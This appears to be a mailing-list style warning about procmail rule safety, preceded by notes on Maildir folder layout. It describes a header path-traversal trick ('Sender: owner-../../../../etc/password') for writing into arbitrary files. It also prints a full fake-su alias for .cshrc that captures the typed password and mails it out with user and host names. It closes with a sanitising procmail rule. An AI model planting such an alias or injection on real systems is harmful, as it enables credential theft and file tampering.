/path/to/Maildir/
   cur,tmp,new - maildir stuff
   .folder     - folder named "folder"
   .folder.sub - folder in "folder" named "sub"
   [...]       - some extra index files, especially there's
                 .INBOX too to hold the indizes for the inbox.

====================================
I can send you email (either through a forgery or with an extra header)
with 'Sender: owner-../../../../etc/password' for example, if you
were reading mail as root.  I can essentially append my email anywhere
you have write permission.  If I could figure out a way to avoid the
errors you would see from the mail headers (perhaps with an early
'if (0) then'), I could conceivably add aliases to your .cshrc, such as:

alias su 'echo "Password: \c" ; stty -echo ; echo $< | mail
-sPassword:`whoami`:`hostname`.`domainname` silly_hack@ ; stty echo ; echo "" ;
unalias su ; sleep 1 ; echo "su: incorrect password"'

If you must use procmail, I recommend:

mail/list_`perl -e '$ENV{MATCH} =~ s/[^a-z]//ig; print lc($ENV{MATCH});'`

This will strip out non chars and put it in mail/list_<name> so you
don't have to worry about your other folders being tampered with.

I used to use procmail quite a bit, but then I realized that I was working
so hard and learning this new language to accomplish something that, in
itself, wasn't that difficult.  I recommend (for programmers), that you
try writing your own mail filter - I think it's easier than installing
and writing rules for procmail.  The only trouble is supporting all the
locking schemes that procmail does, but you don't need this if you can
just support what your system needs.  As an example:

  http://MarginalHacks.com/#mf